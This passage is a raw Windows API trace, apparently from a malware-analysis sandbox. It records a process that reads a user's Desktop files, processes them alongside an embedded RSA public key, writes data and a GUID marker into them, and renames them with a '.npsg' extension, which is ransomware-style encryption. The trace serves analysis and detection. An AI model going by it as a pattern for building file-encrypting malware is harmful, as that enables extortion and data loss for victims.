hHeap=0x620000) returned 1 [0236.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0236.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0236.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0236.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.333] WriteFile (in: hFile=0x644, lpBuffer=0x3b7fcd0*, nNumberOfBytesToWrite=0x1415, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b7fcd0*, lpNumberOfBytesWritten=0x39afb14*=0x1415, lpOverlapped=0x0) returned 1 [0236.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7fcd0 | out: hHeap=0x620000) returned 1 [0236.334] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x141a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.334] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cbd8 [0236.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b7a060 [0236.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b7a060, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0236.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b947f8 [0236.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0236.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cbd8 | out: hHeap=0x620000) returned 1 [0236.334] WriteFile (in: hFile=0x644, lpBuffer=0x3b947f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b947f8*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0236.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0236.334] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.334] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.335] CloseHandle (hObject=0x644) returned 1 [0236.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0236.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x3b8f7a8 [0236.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0236.336] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nPWhBQN.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\npwhbqn.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nPWhBQN.png.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\npwhbqn.png.npsg")) returned 1 [0236.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.337] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x68a920 | out: hHeap=0x620000) returned 1 [0236.338] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab4c98a0, ftCreationTime.dwHighDateTime=0x1d5bf6a, ftLastAccessTime.dwLowDateTime=0x540e48a0, ftLastAccessTime.dwHighDateTime=0x1d5be24, ftLastWriteTime.dwLowDateTime=0x540e48a0, ftLastWriteTime.dwHighDateTime=0x1d5be24, nFileSizeHigh=0x0, nFileSizeLow=0x420c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PUalx1NgN7ygE.flv", cAlternateFileName="PUALX1~1.FLV")) returned 1 [0236.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0236.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x68a920 [0236.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.339] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PUalx1NgN7ygE.flv") returned=".flv" [0236.339] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PUalx1NgN7ygE.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pualx1ngn7yge.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.339] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=16908) returned 1 [0236.339] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.342] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x41e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.342] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.344] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.344] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x420c, lpOverlapped=0x0) returned 1 [0236.345] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.345] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.345] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.345] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a440) returned 1 [0236.346] CryptCreateHash (in: hProv=0x67a440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.346] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.346] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.346] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.346] GetLastError () returned 0x0 [0236.346] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.346] CryptReleaseContext (hProv=0x67a440, dwFlags=0x0) returned 1 [0236.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.347] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.347] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.347] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4210) returned 0x3b7fcd0 [0236.347] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0236.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0236.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95158 [0236.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34000b0 [0236.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b951a0 [0236.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34000c8 [0236.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34000f8 [0236.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400158 [0236.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400110 [0236.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0236.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b8d7c0 [0236.348] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8f7a8 [0236.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000f8 | out: hHeap=0x620000) returned 1 [0236.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400110 | out: hHeap=0x620000) returned 1 [0236.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400158 | out: hHeap=0x620000) returned 1 [0236.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400158 [0236.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0236.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400110 [0236.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34000f8 [0236.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0236.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0236.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0236.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0236.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0236.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400110 | out: hHeap=0x620000) returned 1 [0236.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000f8 | out: hHeap=0x620000) returned 1 [0236.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400158 | out: hHeap=0x620000) returned 1 [0236.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0236.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.349] GetCurrentThreadId () returned 0x5b4 [0236.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x688750 [0236.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a440 [0236.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.349] GetCurrentThreadId () returned 0x5b4 [0236.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0236.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400158 [0236.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34000f8 [0236.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0236.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400110 [0236.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34000e0 [0236.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400170 [0236.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400140 [0236.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400128 [0236.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400188 [0236.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400128 | out: hHeap=0x620000) returned 1 [0236.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400128 [0236.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400140 | out: hHeap=0x620000) returned 1 [0236.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0236.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0236.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0236.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34000f8 | out: hHeap=0x620000) returned 1 [0236.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34000f8 [0236.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0236.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400158 | out: hHeap=0x620000) returned 1 [0236.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0236.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400188 | out: hHeap=0x620000) returned 1 [0236.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x346fd28 [0236.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7ba60 [0236.352] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x420c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.353] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.353] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.353] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.353] CloseHandle (hObject=0x644) returned 1 [0236.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4438 [0236.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x3b8f7a8 [0236.354] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PUalx1NgN7ygE.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pualx1ngn7yge.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PUalx1NgN7ygE.flv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pualx1ngn7yge.flv.npsg")) returned 1 [0236.356] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54f19720, ftCreationTime.dwHighDateTime=0x1d5c3df, ftLastAccessTime.dwLowDateTime=0x928e28a0, ftLastAccessTime.dwHighDateTime=0x1d5c2ef, ftLastWriteTime.dwLowDateTime=0x928e28a0, ftLastWriteTime.dwHighDateTime=0x1d5c2ef, nFileSizeHigh=0x0, nFileSizeLow=0x1631c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pYabFVF0oorlqx_.wav", cAlternateFileName="PYABFV~1.WAV")) returned 1 [0236.356] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pYabFVF0oorlqx_.wav") returned=".wav" [0236.356] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pYabFVF0oorlqx_.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pyabfvf0oorlqx_.wav"), 